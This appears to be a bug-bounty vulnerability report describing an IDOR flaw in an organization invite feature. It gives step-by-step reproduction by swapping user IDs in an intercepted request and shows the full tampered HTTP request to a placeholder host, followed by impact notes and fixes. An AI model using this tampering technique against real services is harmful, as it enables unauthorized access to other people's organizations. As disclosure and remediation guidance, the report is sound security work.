critical idor allow the attacker to takeover the victim org user invites

amitkh

A critical Insecure Direct Object Reference (IDOR) vulnerability exists in the user invite functionality.
By manipulating the User ID parameter in the invite request, an attacker can take over the victim’s organization user invitations and invite arbitrary accounts to the victim’s org—without authorization.

This results in full compromise of the victim’s organization membership, allowing malicious users to join the victim’s workspace.

Step 1: Login as Attacker

The attacker logs into their own valid account.

Step 2: Trigger an Invite Request

The attacker attempts to invite a user to their organization and intercepts the request using Burp Suite or any proxy tool.

Step 3: Modify the User ID

Inside the intercepted request, the User ID responsible for sending the invite is visible.

➡️ Replace:

attacker-user-id

➡️ With:

victim-user-id

Step 4: Forward the Modified Request

Send the manipulated request to the server.

✔ The attacker is now able to send an invite on behalf of the victim.
✔ The victim’s organization user invites are fully compromised.

Affected Request
POST /members/invite/victim-invited-user-id?Email=our-mail-id HTTP/2
Host: example.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: itcXTIrRd15LT1NljWk8zPliHXmDcPTUWejP6HaKeQY
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: https://example.com
Sec-Gpc: 1
Referer: https://example.com/user/connections
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close

Email=1q%40q.om&AgentID=1008352&UserAgentID=327822

Impact

Unauthorized invitations sent on behalf of other users
Account takeover possibilities
Organization-level access abuse
Trust boundary violation
Potential lateral movement within the platform

Recommended Fix

✅ Enforce server-side authorization checks
✅ Validate ownership of UserID before processing requests
✅ Never trust client-controlled identifiers
✅ Implement role-based access control (RBAC)
✅ Log and monitor invite activity
✅ Use UUID-based mapping instead of predictable IDs